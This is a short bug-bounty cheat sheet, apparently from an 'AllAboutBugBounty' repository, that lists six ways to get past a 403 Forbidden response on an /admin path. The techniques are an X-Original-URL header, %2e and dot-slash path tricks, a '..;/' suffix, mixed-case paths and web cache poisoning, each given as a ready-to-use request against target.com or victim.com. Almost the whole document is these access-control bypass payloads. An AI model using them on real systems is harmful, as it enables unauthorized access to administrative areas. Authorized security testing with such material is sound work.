Projects STRLCPY AllAboutBugBounty Files
🤬
01be8784
ROOT /
Bypass /
Bypass 403.md
62 lines | UTF-8 | 963 bytes

403 Forbidden Bypass

  1. Using "X-Original-URL" header
GET /admin HTTP/1.1
Host: target.com

Try this to bypass

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
  1. Appending %2e after the first slash
http://target.com/admin => 403

Try this to bypass

http://target.com/%2e/admin => 200
  1. Try add dot (.) and slash (/) in the URL
http://target.com/admin => 403

Try this to bypass

http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/./ => 200
  1. Add "..;/" after the directory name
http://target.com/admin

Try this to bypass

http://target.com/admin..;/
  1. Try to uppercase the alphabet in the url
http://target.com/admin

Try this to bypass

http://target.com/aDmIN
  1. Via Web Cache Poisoning
GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin

Source: @iam_j0ker

Please wait...
Page is in error, reload to recover